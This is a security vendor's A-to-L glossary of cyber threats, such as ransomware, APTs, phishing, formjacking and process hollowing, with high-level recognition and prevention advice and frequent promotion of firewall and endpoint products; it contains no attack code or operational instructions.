Firewalls.com’s Comprehensive Cyber Threat Dictionary
Cyber threats lurk around every corner in today’s online world, and more sophisticated attacks are created each day to bypass your defenses. The first step in stopping these threats is understanding what they are, how they work, and what vulnerabilities they’re targeting. That’s why Firewalls.com compiled the Threat Dictionary, an A to Z guide to the dangers your organization faces every day. The next step after understanding the threats? Strong network protection.
Adaptive Ransomware Attack
What is an Adaptive Ransomware Attack?
An Adaptive Ransomware Attack (ARA) refers to a ransomware attack that combines advanced automation and real-time human response. Hackers adapt their tools and techniques on the fly to get around defense mechanisms and infect your network with ransomware.
How to Recognize This Threat: A computer with ransomware will receive a message that a type of ransom is required to access files that were previously accessible. The files will be locked with the threat of destruction/deletion if the user does not pay a specified ransom. Theoretically, once the ransom is paid according to instructions, the hackers will provide unlock instructions and the files can be accessed once again. Adaptive ransomware attacks will manifest in the same way as other ransomware attacks, but attack visualization is needed to identify whether the ARA variation occurred.
How to Prevent This Threat: Strong End User Protection with advanced detection and remediation capabilities is key to both recognizing and stopping adaptive ransomware attacks. Combine this protection with attack visualization to ensure you understand the severity of the attack, where it came from, and how many of your data and processes were affected. Check out end user protection options from Sophos and SonicWall.
Advanced Persistent Threat
What is an Advanced Persistent Threat?
An Advanced Persistent Threat (APT) is a targeted attack which entails a dedicated threat actor specifically choosing a network (or networks) to go after. In an Advanced Persistent Threat, attackers are actively managing the direction, method, and intensity of a cyber attack once they initially infiltrate a network, as opposed to many other cyber attack types which are largely automated. These types of pre-planned attacks usually seek specific information about their victims via cyber reconaissance. These attack types are also unique in that attackers may remain on the network for a longer period of time while they hunt for information they deem valuable and more advanced network privileges.
How to Recognize This Threat: Unlike many cyber attacks, Advanced Persistent Threats are neither opportunistic nor indiscriminate. Your network may be a victim of an APT attack if executives are targeted as part of a whaling email campaign, if there are unusual logons noted after hours, and if data is moving in unusual methods or volume.
How to Prevent This Threat: Training employees to avoid downloading suspicious attachments or clicking suspicious links in emails can help close a key point of entry for APT hackers. Another tip: keeping all of your software up to date with the latest patches. But the overarching solution to protecting your network is a layered security approach, starting with a firewall complete with active security services. Pick from the top brands to get one shipped to you today.
What is Adware?
Adware is any software application that displays advertising banners, pop-ups, or other unwanted advertising content on your computer. It is intrusive software that can insert advertising graphics directly on a device, collect marketing data, or redirect online users to advertising websites without consent. While not all Adware is malicious, it is generally not only annoying but can also greatly impact the performance of devices and networks. In worst case scenarios, faulty programming of Adware can cause security vulnerabilities for victim networks. Adware is often intentionally designed to be difficult to remove for a system. Common forms of Adware include Browser Hijackers and bulky toolbars.
How to Recognize This Threat: It is not hard to recognize adware on your system in most cases, as you’ll likely notice the presence of unwanted ads either upon startup or while browsing in addition to speed issues. It generally comes as an unwanted download attached to software accessed on a questionable website or can come through an email attachment.
How to Prevent This Threat: Avoid questionable downloads and attachments. And equip your network with robust endpoint security that can ID, block, and remove unwanted adware from your systems.
What is an Anonymizing Proxy?
Anonymizing Proxies are severs that function as an anonymous relay between a user and a destination website to obfuscate web browsing activity. Some proxies also provide a primitive layer of encryption on the user side. Anonymizers are used for a multitude of reasons, both good and bad. Some anonymizers help to minimize risk for web surfers by preventing identity theft or covering up browsing history, which can also stop targeted digital marketing. In more malicious cases, anonymizing proxies are used to bypass legitimate security barriers that are meant to reduce network attack surfaces, such as content filters that block access to certain sites from work computers. Organizations can be liable when users access illegal sites using official devices. Other risks include not knowing who is operating and running anonymizing proxy servers. Some proxies may be used for gathering sensitive user data, recording browsing habits, or distributing malware.
How to Recognize This Threat: The idea of anonymizing proxies is to avoid detection and oversight, but a network with strong security monitoring both automated and by IT staff can typically recognize their usage.
How to Prevent This Threat: With a properly configured firewall plus active security services, you can stop users from circumventing your filters. Get a firewall Free with a 3-year security subscription and get it configured by our experts to ensure your security is optimized.
What is Atom Bombing?
Atom Bombing is a form of cyber attack that targets a vulnerability with Window’s Atom Tables to inject and execute malicious code. While code injection is a well-known technique, Atom Bombing provides the potential for an attacker to create a breach and set up a persistent presence in a network. Atom tables are used by Windows applications to store integers and data strings that are shared between programs. This type of attack demonstrates how threat actors take advantage of operating systems to use legitimate pieces of those systems maliciously.
How to Recognize This Threat: As atom bombing hides malicious code in a legitimate part of the operating system, it is difficult to specifically detect, but antivirus and antimalware software is always updating to recognize the latest threats.
How to Prevent This Threat: This attack does not target an actual vulnerability, so there is no Windows patch, however it is always a good idea to keep your operating system updated i
n case a fix is added. To guard against attacks, ensure your systems all have robust endpoint security.
What is an Auto-Run Worm?
Auto-Run Worms are one of the top reasons to leave strange USB sticks where you find them! Commonly distributed through USB drives, Auto-run Worms are designed as a “surprise attack” that takes advantage of the Windows Auto-Run feature (autorun.inf) to automatically execute malicious code without user consent when an infected device is plugged into a computer. Many forms of this attack also utilize Windows’ Autoplay functions.
How to Recognize This Threat: The threat generally occurs through removable media. If an unverified media object has been inserted and automatically launches, there is a potential for infection.
How to Prevent This Threat: Many modern operating systems disable Auto-Run by default, minimizing the threat of this type of worm. Ensure you have strong endpoint protection just in case as well, so that any infiltration gets squashed immediately.
What is a Backdoor Trojan?
Backdoor Trojans are malicious software programs designed to grant unwanted access for a remote attack. Remote attackers can send commands or leverage full control over a compromised computer. Backdoor malware and viruses bypass authentication procedures to access systems and to prevent their presence from being detected. The designation as a Trojan indicates that this form of attack does not reproduce by spreading to additional files after infection. Once a Trojan gains a foothold in a system, it adds itself to the computers startup routine so that rebooting the computer will not permanently end malicious processes.
How to Recognize This Threat: Backdoor Trojans may pose as legitimate software to trick users into running them. They can also spread as attachments or malicious links in spam email.
How to Prevent This Threat: Training users to avoid clicking on suspicious links and avoid downloading email attachments is a good start, but to ensure your network is protected, get a firewall from a top brand along with a security services subscription.
Boot Sector Malware
What is Boot Sector Malware?
Boot Sector Malware applies changes to the Startup processes of an infected computer and replaces a device’s original boot sector system with its own modified version, automatically overriding and hiding the original version elsewhere on the hard disk. Malware becomes active after start up when the altered boot sector version of the operating system is activated. Some variants of boot sector malware are designed to load up before the operating system, effectively concealing their presence.
How to Recognize This Threat: Boot sector viruses are typically spread via physical media like flash drives and disks, though they may also be sent as email attachments.
How to Prevent This Threat: Strong, continuously updated robust endpoint security will prevent boot sector malware from infecting your users and network.
What is a BotNet?
A BotNet consists of a large collection of infected systems that can be remotely operated by a single threat actor in order to execute large-scale malicious purposes. Botnets can be used to send spam email, launch denial-of-service attacks, or more. Although the owner of the affected device is unaware, a threat actor can make use of the system to do their bidding in future attacks. An infected device is often called a “zombie” and the greater total collection of zombie computers constitute a botnet. A botnet can be made up of hundreds or thousands of infected computer systems.
How to Recognize This Threat: A computer or device that is part of a botnet will run especially slow while the user is active, and will also continue activity when the user is not present. The method of infection is typically downloaded malware, often from a suspicious email attachment.
How to Prevent This Threat: To prevent devices on your network from becoming infected as well as decrease the likelihood of a potential botnet attack, protect your organization with a firewall along with a security services subscription. Get a Sophos or SonicWall firewall Free with a 3-year subscription!
What is a Browser Hijacker?
Browser Hijackers make alterations to your default homepage, search engine, or browser without consent. These attacks may lead to semi-permanent changes in your browsing experience, possibly removing the option to reset the homepage or other settings. It is a practice used to artificially inflate a site’s page ranking in search results, which can boost ad revenue.
How to Recognize This Threat: The user will note a difference when surfing the internet, with an unusual homepage displaying upon opening the web browser and other potential problems with the browsing experience. The offending malware often comes through a suspicious email attachment or bundled with another piece of software downloaded from a questionable source.
How to Prevent This Threat: Aside from user vigilance, a robust endpoint security solution will catch the nasty software to prevent it from messing with your web browsing.
Brute Force Attack
What is a Brute Force Attack?
A Brute Force Attack occurs when hackers simply bombard a computer, application, website, or network sign-in with a large number of possible passwords to gain unauthorized access. Hackers can use special programs to try several passwords in a short period to attempt an unauthorized sign-in.
How to Recognize This Threat: Administrators can detect this type of attack by volume. The logs of whatever password-protected log-in is targeted will show an inordinately high amount of traffic.
How to Prevent This Threat: Logins can be configured to allow only a few attempts before blocking an IP address. Passwords should also be made as complex as possible, making a quick attack impossible. Need help setting up your network sign-ons? Reach out to our Security Operations Center for a solution!
What is a Buffer Overflow?
A Buffer Overflow takes place when a program overwrites other parts of a computer’s memory to store excess data, which can cause errors or even crashes. Hackers launch buffer overflow attacks by sending more data to a program than it expects (often including malicious code), leading the application to take over operating system memory. This action can allow unauthorized code to execute or simply lead to a system crash.
How to Recognize This Threat: Buffer overflows can occur in any application, not just core programs or services. An area to pay special attention to is any code dealing with input supplied by an outside source such as a user, as this code provides an easier path for exploitation (especially if there is no bounds checking).
How to Prevent This Threat: This attack almost always occurs at the application level, so keeping all your applications updated with the latest security patches will cover any known vulnerabilities. Buffer overflows can also be executed by viruses, so ensure your network is protected with a firewall from a top brand along with an active security services subscription.
Business Email Compromise (BEC)
What is Business Email Compromise (BEC)?
Business Email Compromise (BEC) – also referred to as a man-in-the-email attack – occurs when a hacker impersonates an executive, sending emails as the executive to trick employees into transferring funds, sending sensitive data, or opening a malicious attachment. These attacks can use compromised internal addresses or addresses that look similar to those within the network.
How to Recognize This Threat: Employees should be suspicious of emails asking for the transfer of funds or data outside of normal operating procedure, as well as any inconsistency in language. In these scams, hackers typically do extensive research into their targets, but they are still likely to miss a key detail or two.
How to Prevent This Threat: Well-trained employees with well-established procedures should know not to jump at these suspicious messages. Robust email security should be in place to protect your network. It can even be configured to flag emails with keywords like “transfer,” “payment,” etc. so that they receive extra attention.
What is Clone Phishing?
Clone phishing refers to a type of phishing email attack that uses an actual email that’s successfully been delivered before to create an identical (or nearly identical) copy. The clone phishing email may contain the same content, attachment, recipient, and sender email address as the genuine article, except a fraudulent link or attachment replaces the original.
How to Recognize This Threat: Because a clone phishing email appears to be from a legitimate source, unsuspecting victims likely won’t have the same suspicions that a sloppier phishing email – which is often filled with typos or a clearly visible phony address – would generate. Regardless though, users should inspect every link and attachment within any email very carefully before clicking.
How to Prevent This Threat: If anything seems fishy (or phishy) after inspecting an email – even if it looks legit – it’s best to train users not to click through. But since humans are involved, your network should incorporate email protection that takes a deeper look at everything coming through your inbox, filtering out spam and other suspicious messages. Learn about Barracuda Email Security for a wide array of options to consider.
What is Code Caving?
Code Caving occurs when a hacker hides malware within a legitimate application. The hacker injects malicious code through a “code cave,” filling previously empty or unused space in an application.
How to Recognize This Threat: This appears to the user to be good software as it also fools many traditional security applications into whitelisting it. It takes a robust endpoint solution to detect its presence.
How to Prevent This Threat: Sophos Intercept X endpoint protection is built to detect unauthorized code cave content and stop it from causing any damage to your computer or network. Try it free before buying!
Command & Control Center
What is a Command & Control Center?
A Command & Control Center (aka a C&C or C2) is a computer that controls a botnet. From a C&C, hackers can instruct this network of zombie computers to perform desired activities, such as launching distributed denial-of-service attacks against websites. Some botnets are controlled by a distributed command and control system, which makes them tougher to shut down.
How to Recognize This Threat: Computers on your network that are infected with malware could have a command & control center behind them trying to further communicate. Analyzing traffic, and especially taking note of communication activity coming from an otherwise dormant computer may be a clue.
How to Prevent This Threat: Configuration is key to keeping C&Cs from communicating with your network. The right configuration means strong egress rules and more. Our engineers are masters of firewall configuration, so let them do the heavy lifting for you!
What is a Cookie?
How to Recognize This Threat: Cookies are automatically collected by websites unless the user opts out of cookies or adjusts web browser privacy settings.
How to Prevent This Threat: Cookies are not a threat in themselves. They can be controlled by regularly deleting them or by setting web browsers not to share them automatically. Prevent cookies being used against your organization with a firewall from a top brand.
What is a Credential Threat?
A Credential Threat involves a hacker attempting to steal the login credentials of a user and then using those credentials to gain access to the user’s accounts, often specifically focusing the user’s organizational access.
How to Recognize This Threat: Credential threats typically originate via email, with spearphishing and whaling emails designed to steal users’ login information and passwords.
How to Prevent This Threat: Organizations should train users to look for the signs of phishing emails and teach them how to avoid falling victim to them. Most importantly though, organizations should have robust cyber security measures in place, including a firewall with active security services. Get a firewall Free with a 3-year subscription.
What is a CryptoLocker?
CryptoLocker is a trojan horse virus that encrypts virtually any files associated with an infected system, allowing the threat actors who’ve deployed it to hold them for ransom. It, and other malware like it, is also more commonly known as ransomware.
How to Recognize This Threat: Once files are encrypted, the CryptoLocker virus will display a screen with the desired ransom amount to allow victims who’ve paid to receive an encryption key to regain access to files. This and other ransomware types often enter a system through an email attachment in an infected Microsoft Word .doc file or .pdf.
How to Prevent This Threat: Employees should be trained to avoid clicking on any unknown or unverified attachments. Additionally, the latest next generation firewalls with updated security services including machine learning and sandboxing can help find and prevent these threats. Rules limiting network access to only those who need it can prevent more widespread encryption if one computer is infected. And as with any ransomware, regular backups of network files make it possible to restore your data without requiring an encryption key.
What is Cyber Reconnaissance?
Cyber Reconnaissance refers to the practice of covertly gathering data online. This intelligence gathering can be done with both pure and unpure intentions. Bad actors use various methods to gather information about potential attack victims and find exploitable weaknesses. The information gathered can be used to imitate or bribe an individual to gain access to a wider network, or simply to help the attacker understand points of weakness in a network setup. Additionally, it aids in developing phishing email campaigns. On the positive side, threat intelligence experts conduct cyber reconnaissance around the clock to track and prevent cyber threats.
How to Recognize This Threat: The threat is all around, with data about individuals often readily available throughout the online world. How pervasive is it? According to Verizon, cyber reconnaissance, is a part of over 90 percent of successful breaches. Bad actors gather information on targets via social media, online searches, comment and message boards, and more.
How to Prevent This Threat: Users should secure their social media accounts with strong privacy settings and take care when posting any information online. Businesses too should practice strong hygiene online to minimize the cyber footprint of employees and the company. Separating business from personal activity and making it difficult for attackers to tie an individual to a specific organization is helpful as well.
What is DarkSide Ransomware?
Powering its way onto the threat landscape in Summer 2020, the DarkSide ransomware operation involves a group of threat actors deploying highly targeted attacks. These attacks have a variety of ransoms attached, depending on the organization’s ability to pay (as studied by the group). DarkSide does not refer to a specific type of ransomware, as the group creates a customized executable file for each target.
How to Recognize This Threat: As with any ransomware, DarkSide is not interested in being secretive once it infects a network. Files will be encrypted and a message will display with the ransom amount required to unlock them. Additionally, victims suffer data exfiltration, with that information posted to a data leak site to further encourage payment.
How to Prevent This Threat: As with most threats, a multi-faceted approach is key. A trained workforce that behaves responsibly online is a good start. But for further protection against DarkSide and other ransomware, a next generation firewall with the latest security services can help find and block these threats. Additionally, regular backups of network files make restoring your business possible without the need for an encryption key.
What is Data Leakage?
Data Leakage occurs when sensitive information is exposed in an unauthorized manner. From another angle, it involves the failure to protect such information, and it can lead to data loss or data theft.
How to Recognize This Threat: The threat of data leakage is especially great when data is shared between multiple management applications within an organization, such as Human Resources, CRM, and Accounting tools.
How to Prevent This Threat: Access Control Lists, encryption, and generally strong internal network security are a must. A cornerstone of network security is a robust firewall, through which all traffic should be managed. See excellent firewall options from a variety of top brands.
What is Data Loss?
Data Loss describes accidentally losing data, rather than having it stolen.
How to Recognize This Threat: Data loss can occur when an employee misplaces a device such as a laptop, phone, or flash drive that contains sensitive information.
How to Prevent This Threat: Protect your organization from lost data falling into the wrong hands with strong data security techniques, preventing unauthorized access to your devices. Learn how our experts can help you with Access Control Lists and other security services.
What is Data Theft?
Data Theft involves deliberately stealing information from an organization (not an accidental loss of data). Data theft can occur both from within (as in an employee) or without (as in a hacker). Hackers typically steal data using malware such as keyloggers or spearphishing emails. Data theft can also be accomplished through stolen hardware, like computers and flash drives.
How to Recognize This Threat: It often takes organizations quite awhile to detect a data breach (an average of more than 6 months according to a Ponemon Institute study). To recognize data theft, organizations should monitor network and employee activity, and have data theft detection tools in place.
How to Prevent This Threat: Prevent data theft with robust network security measures. There’s no better starting point than a next-generation firewall. Find the option that’s right for your network size.
What is a Denial-of-Service Attack?
A Denial-of-Service (DoS) Attack is an effort by a hacker to overload or shutdown a service, preventing legitimate users from accessing it. Typically, DoS attacks target web servers, aiming to crash websites by flooding them with more traffic than they can handle. No data is stolen or compromised, but the service interruption can cause financial or reputational damage to an organization. The most common method to carry out an attack is by using a botnet (multiple hacker-controlled computers) to overload the server with requests, in what is called a Distributed Denial-of-Service (DDoS) attack.
How to Recognize This Threat: The obvious symptom of a DoS attack is unavailability of a normally reliable website or service, from online gaming to email. These attacks can also cause major network slowdowns for those affected.
How to Prevent This Threat: Stop a DoS attack by denying hackers access to your network. That means a powerful firewall with active security services as part of a layered security approach.
What is DNS Hijacking?
DNS (Domain Name System) Hijacking (or poisoning) occurs when a hacker changes a computer’s settings to either ignore DNS or use a DNS server controlled by other hackers. DNS is considered the “phone book of the internet.” It allows browsers to translate websites into IP address numbers. By interrupting this system, it allows attackers to redirect communication to fraudulent sites, like fake login pages for banks and credit cards, which they then use to steal login information.
How to Recognize This Threat: DNS hijacking is difficult for the average user to recognize, as it occurs behind the scenes and may not always affect regular web browsing behavior. Signs can exist though, including difficulty navigating the web. Online testers exist to determine if your DNS has been hijacked.
How to Prevent This Threat: A hacker still needs a way in to launch a DNS hijacking attack, so keep all applications up-to-date with the latest patches, and ensure your network has a state-of-the-art firewall with active security services.
What is Document Malware?
Document Malware is a type of malicious code embedded within documents. In other words, hackers take advantage of vulnerabilities in applications that read or allow editing of documents, like Microsoft Office or Adobe Acrobat. Hackers exploit these vulnerabilities by including malware code within documents that infects a computer once these documents are opened.
How to Recognize This Threat: As with any file-based malware, the most likely delivery method is via email, as a malicious attachment that must be opened to cause harm.
How to Prevent This Threat: Train your users to be on the lookout for suspicious attachments, and ensure your network is equipped with strong & up-to-date email security hardware/software.
What is a Drive-By Download?
A Drive-By Download involves a computer becoming infected with malware simply by visiting a malicious website. This means no clicks are required to infect a computer with malware. Drive-by downloads exploit browser (and plug-in) vulnerabilities to deliver malicious software to a computer.
How to Recognize This Threat: Recognizing the threat is difficult, as often drive-by downloads are connected to compromised, legitimate sites that a user may regularly visit. This means, users do not need to be tricked into visiting a malicious site to become infected.
How to Prevent This Threat: Avoiding unknown, malicious sites is still recommended to limit possible exposure. Beyond that, browsers should be kept up-to-date, and networks should be equipped with robust endpoint security along with web filtering.
What is Dropper Malware?
A Dropper is a program that injects – or drops – other malicious software such as viruses or worms onto a computer. Droppers may also be a delivery mechanism for a ransomware attack.
How to Recognize This Threat: Droppers can often execute their objective without saving onto a computer’s internal storage, which make them especially difficult to detect.
How to Prevent This Threat: Access control giving few users administrative privileges can help prevent droppers from causing major network damage. But the best insurance is a firewall plus security services subscription. Bundle these and get FREE hardware from Sophos or SonicWall.
Email Malware Distribution
What is Email Malware Distribution?
Email Malware Distribution refers to a primary method used by hackers to spread malware: sending it via email. Some of the most widespread viruses have proliferated through attachments in email, with the user mistakenly double-clicking to download the malicious software. Email is still used as a method to distribute malware, though the focus has shifted from attachments to embedded links that take the user to a malicious website.
How to Recognize This Threat: Users can recognize email threats by examining their messages closely for signs of anything unusual, whether it be an unknown sender, strange typos, unknown links/attachments, or style/content issues that make an email look less than official.
How to Prevent This Threat: Users should be trained to look for signs of suspicious messages and avoid clicking on attachments/links included within them. Your network should also be equipped with robust email security hardware/software.
What are Encrypted Threats?
Encrypted threats are any threats that use encryption to go undetected. They include attack types like malware, ransomware, spear-phishing,
zero-day, data exfiltration, rogue sites, and more. Just as there are many types of encryption, there are many methods attackers use to transmit encrypted threats.
How to Recognize This Threat: One type of encrypted threat is a certificate vulnerability, in which the security certification of a particular website is not up to snuff – usually signified by an alert in your browser. In another, malware embeds all its communications inside an encrypted tunnel, so traditional network security cannot spot it. And yet another involves breaches of encrypted traffic, taking advantage of the encryption to execute man-in-the-middle attacks. Hackers use this attack type to intercept emails or steal credentials, transaction data, and other private information.
How to Prevent This Threat: Protecting against encrypted threats requires the latest technology, starting with a next generation firewall (NGFW). The latest firewalls are a starting point to deploy advanced security services, such as Deep Packet Inspection from SonicWall. This subscription add-on offers visibility into encrypted traffic, blocks encrypted malware downloads, and IDs unauthorized transmission of data to external systems.
Evil Twin Attack
What is an Evil Twin Attack?
An evil twin attack involves an attacker setting up a fraudulent wireless access point – also known as an evil twin – that mimics the characteristics (including the SSID) of a legitimate AP. This attack has existed about as long as wifi has. Users may connect automatically to the evil twin or do so thinking the fraudulent AP is part of a trusted wifi network. Attackers can expedite this process by affecting the connection to the legitimate AP their device is mimicking. Once users have connected to an evil twin, they may be asked to enter a username/password to gain access via a fraudulent form which goes to the attacker. Or the attacker can simply eavesdrop and intercept any unsecured information users transmit – all without their knowledge.
How to Recognize This Threat: Not easily…You will be able to get online and the network listed will appear to be legitimate (though do look for and avoid any network names that are slightly off).
How to Prevent This Threat: Some would suggest not using any public wifi networks, but if that is impractical, VPN can provide an extra layer of security when accessing these networks. Also be aware of the procedures required to connect to any public network (whether they require authentication) and avoid transmitting any sensitive information when using these connections. As a network administrator, ensure you have strong security mechanisms in place, including authentication for users to access your network, endpoint protection (for both network and public users), and secure wifi. A Wireless Intrusion Prevention System (WIPS) such as the one offered through WatchGuard wireless access points can detect evil twins and even stop any managed clients from connecting to them.
What is Exfiltration in cybersecurity?
Exfiltration in cybersecurity refers to bad actors stealing or moving data. Exfiltration is also known as data theft or data exfil or extrusion, exportation, or extraction. Whatever terminology, it boils down to unauthorized data movement. It can occur through malware infection or even through physical theft of devices that house sensitive data.
How to Recognize This Threat: Without the right tools, it can take organizations months to recognize data is gone. Deploy tools that offer visibility into your network and all related employee activity.
How to Prevent This Threat: What are those tools? The latest management consoles for networking devices like firewalls offer broad visibility into network activity, helping you detect and prevent exfiltration. Well-trained employees who know to avoid clicking on any unknown or unverified attachments help prevent malware designed to exfiltrate data from entering your network. Email security is a good supplement in that regard. And of course, securing your physical devices with locks and strong authentication measures makes it difficult for bad actors to get your data, even if they get the devices.
What is an Exploit?
An Exploit is the door through which a hacker gains access to your computer or network. It takes advantage of a vulnerability in a specific application to deliver malware and cause damage to your organization. The exploit door is typically closed when the vulnerability is patched.
How to Recognize This Threat: News related to application vulnerabilities should be regularly monitored, as hackers are doing the same. Developers will release patches typically as soon as they become aware of these vulnerabilities.
How to Prevent This Threat: Ensure you update your software applications and operating system every time updates are pushed out to ensure you have the least vulnerable versions with the latest patches. And of course, make sure your network is protected if a hacker comes calling with a firewall combined with an active security services subscription. See your options from the top brands in network security.
Fake AntiVirus Malware
What is Fake AntiVirus Malware?
Fake AntiVirus Malware, also known as scareware, reports non-existent threats to users with the goal of scaring them into installing malicious software and/or paying for unnecessary product registration and cleanup. This type of malware is generally financially motivated, collecting credit card data of users who believe they must buy the software recommended by the fake antivirus scan.
How to Recognize This Threat: Users typically encounter this type of malware as an unwanted popup from a malicious (or compromised) website that displays a fake online scan message. It is mostly limited to illegitimate sites, but legitimate sites that users normally visit may be compromised with this type of malware for short periods.
How to Prevent This Threat: If such a popup message appears, users should be trained to close it and back out of the page they were visiting without taking any action. To protect your network and each computer on it, ensure you have up-to-date endpoint security protection.
What is Fileless Malware?
Fileless Malware is a type of malware that exists only in RAM – never actually making it onto a computer’s hard drive. Instead, fileless malware leverages operating system tools that are legitimately in use (primarily in Windows) like the system registry to execute malicious scripts. It may also be associated with Microsoft Office Macros, PowerShell, and more.
How to Recognize This Threat: Because it doesn’t depend on the download, installation, or execution of a file on a system, fileless malware is quite difficult to detect. Traditional anti-virus packages rely on the signatures of executable files to sniff out malware, but fileless malware leaves no such signature. In fact, in many cases it only runs when the legitimate process it’s associated with is running as well. And adding an additional measure of difficulty, it only runs when the computer is running and is gone without a trace when it’s rebooted. Fileless malware can infect a system through Office documents, PDFs, or other legitimate file types, or it can come through simple web browsing on an exploit-kit affected site.
How to Prevent This Threat: Users should exercise due diligence in their online behaviors, only going to trusted sites, only opening trusted emails, and only downloading trusted attachments. Admins should closely monitor network activity as well. However, as it is so difficult to detect, behavior and monitoring is not enough. While legacy anti-virus programs are little help, security solution providers of today use machine learning and AI processes that can detect and stop non-signature based malware like fileless malware. That means protecting your network and each computer on it requires have up-to-date endpoint security protection in addition to a firewall with security services.
What is Fleeceware?
Fleeceware is a type of mobile attack that can cost victims considerable money, even without any malicious code in the offending application. An app considered fleeceware typically serves a basic function, like a calculator or a custom keyboard, but charges an often exorbitant subscription fee for its use – think a $10 weekly fee or a $200 monthly fee. These fees may also be deceptively hidden under the guise of a free trial or even increased during the checkout process.
How to Recognize This Threat:
Because there is typically no malicious code involving data theft or device takeover, fleeceware apps often pass the test for app stores. Sophos found dozens of apps between the Google Play store and Apple App Store that fit this criteria in 2020. Recognizing the threat means paying very close attention to any app under consideration for a download and doing due diligence to ensure what it’s offering and the advertised cost make sense.
How to Prevent This Threat: Avoid downloading apps from little known developers unless their authenticity can be verified multiple ways and watch for prices on apps that are often free or near free from other vendors. On top of that, especially avoid agreeing to any form of recurring payment unless it is clearly legitimate.
Check your active app subscriptions both through the app stores and through your credit card statements to ensure you’re only paying for apps to which you’ve intentionally subscribed, and cancel any that shouldn’t be there. Both major mobile app stores continue to take steps to prevent fleeceware apps from making it onto their listings, so take advantage of their initial vetting. And protect your mobile device with Sophos Mobile options for added defense against fleeceware and other mobile malware.
What is Formjacking?
Formjacking essentially involves an attacker placing malicious code onto a normally reputable website that steals the personal information you enter – in other words, an online or virtual credit card or ATM skimming device. This practice has successfully targeted businesses of varying size, though small to medium sized retailers are more frequent victims. Attackers often gain access through third party add-ons and plug-ins that are part of a business website. Formjacking can target any type of online form, so not only credit card and banking information may be stolen, but also social security numbers, passport numbers, and more. According to estimates, thousands of websites have been affected.
How to Recognize This Threat: Users will likely not notice this at all until later discovering fraudulent purchases via credit card or bank statements. And businesses whose sites have been compromised may similarly find themselves unaware for lengthy periods, as the malicious code may not be noticed until an update to website code is made (which could be a several month timeframe). Businesses can potentially identify this sooner if they closely monitor outbound traffic for suspicious activity – providing them a cue to dig deeper.
How to Prevent This Threat: Consumers can take measures to protect themselves, like using a dedicated credit card for online purchases only to more quickly identify suspicious purchases. Avoiding the use of a debit card online is also helpful, as fraudulent purchases are better protected when using credit cards. In addition to strong visibility, businesses should have complete network security solutions in place to make it as difficult as possible for an attacker to gain access to place malicious code. That means a firewall with security services including a web application firewall, regularly updated software, and a close watch on any third party plug-ins used in web development.
What is GandCrab Ransomware?
GandCrab is a type of ransomware first discovered in early 2018. This ransomware has multiple versions that have come out each time security professionals have released encryption keys. Broadly, GandCrab infects a computer, encrypts files, and includes files with a message providing instructions to the user to pay a ransom to have file access restored. In some versions of this ransomware, the message is also displayed as a desktop background. Affected files could have a number of extensions, including .crab or .krab.
How to Recognize This Threat: GandCrab was initially spread as an email scam, when users opened suspicious email attachments. It has since expanded to spread via websites that offer apparently helpful software downloads. Instead of the software, the user downloads the ransomware. It may also be included with certain exploit kits.
How to Prevent This Threat: Users should avoid opening any suspicious email attachments and avoid downloading any software from unverified sources. To protect your network from this threat, ensure you have a robust firewall with security services. See firewall options that fit your network from a variety of top brands.
What is Hacktivism?
Hacktivism refers to politically or socially motivated hacking. This includes cyber attacks against governments, corporations, organizations, and even individuals. Hacktivist attacks come in many forms, including denial-of-service, stealing and leaking sensitive information, and website defacement.
How to Recognize This Threat: Typically, hacktivist attacks are motivated by a high-profile issue, so even though targets vary, the entity will have done something that could have been controversial or have been in a position to right a perceived wrong.
How to Prevent This Threat: Aside from avoiding controversy as an organization, the best way to guard against hacktivists causing problems on your network is to have robust cyber security. It all starts with a firewall. See options from SonicWall, Fortinet, Sophos, & more.
What is a Hollow Process?
A Hollow Process Injection, also called Process Hollowing, refers to the code injection technique used by hackers to replace the executable section of legitimate process with malicious code. This disguises malicious code so that a legitimate process will execute it. The legitimate path remains the same, but the malware is hidden within.
How to Recognize This Threat: This threat is difficult to recognize without advanced IT expertise or specialized scanner software, as once the hollow process injection takes place, the malware is able to delete other remnants of itself on the system.
How to Prevent This Threat: Keeping malware off your network is the best solution to avoiding a hollow process injection. The safest way to do accomplish that level of protection is with a business-class firewall along with a security services subscription. Check out some of the top options available.
What is a Honeypot?
A Honeypot is a trap used by security specialists to gather information about malware or detect attacks by hackers.
How to Recognize This Threat: Honeypots are only threats to hackers, but some types of honeypots include setting up computers as part of a network simply to capture malware or setting up phony servers that log any attacks.
How to Prevent This Threat: Eliminate the need to setup a honeypot by ensuring your network is fully secure. Shop the top firewall brands and get a security services subscription that includes sandboxing, which is kind of like a cloud-based honeypot.
What is an Internet Worm?
An Internet Worm is a type of malware that replicates itself (often quite rapidly) across local networks or the internet simply by using communication between computers. Unlike viruses, they do not require a carrier file or program. Some worms can open a backdoor on a computer allowing hackers to take control and create a zombie system.
How to Recognize This Threat: Worms often initially enter a system as an email attachment. An infected computer will then have performance issues, with worms clogging up memory and automatically sending themselves to contacts far and wide.
How to Prevent This Threat: As with any malware, responsible users should avoid opening suspicious files. Comprehensive detection and protection is the key to preventing worms from causing problems on your network. Get a FREE Sophos or SonicWall firewall with a 3-year security services subscription to secure your organization.
What is Junkware?
Junkware is a somewhat all-encompassing term that covers unwanted or unnecessary programs on your computer. Sometimes referred to as bloatware or Potentially Unwanted Programs (PUPs), junkware is not malicious, but may add vulnerabilities to a system through which malware can enter. They can also slow performance of a system by using memory and processing space.
How to Recognize This Threat: Types of junkware may be adware, remote administration tools, and vulnerability scanners to name a few. Some of these applications may come with a computer out-of-the-box, while others may be included with downloads of programs the user intentionally installs.
How to Prevent This Threat: Administrators can set policies requiring privileges for users to load software on their computers, which can keep users from adding junkware to systems on your network. If junkware is already present or finds its way onto a computer through some other fashion, endpoint security solutions can detect and report many types of junkware to help clean up the system.
What is a Keylogger?
A Keylogger (short for keystroke logger) is a type of malware that records a user’s keystrokes. A hacker can use this information to steal passwords, account numbers, and any other information the user types while being monitored by such a program.
How to Recognize This Threat: Your computer may run more slowly with additional processes clogging up the system. If you suspect your computer has a keylogger, check Task Manager and your computer’s startup configurations to see if there are any unusual/suspicious programs.
How to Prevent This Threat: User vigilance to avoid downloading malware is an important step as always. For your network, ensure you have the latest software updates and strong endpoint protection for each device.
What are Logic Bombs?
Logic Bombs are pieces of code (usually malicious) inserted into a program that will set off a function if certain conditions (such as a behavior or a specific date/time) are met. Such functions could restrict access to or delete files. Logic Bombs – also known as slag code – are dormant until/unless those conditions are satisfied. While their uses are typically malicious – think a disgruntled employee leaving a present after being let go – logic bombs can also be used in trial software to end free access after a certain period.
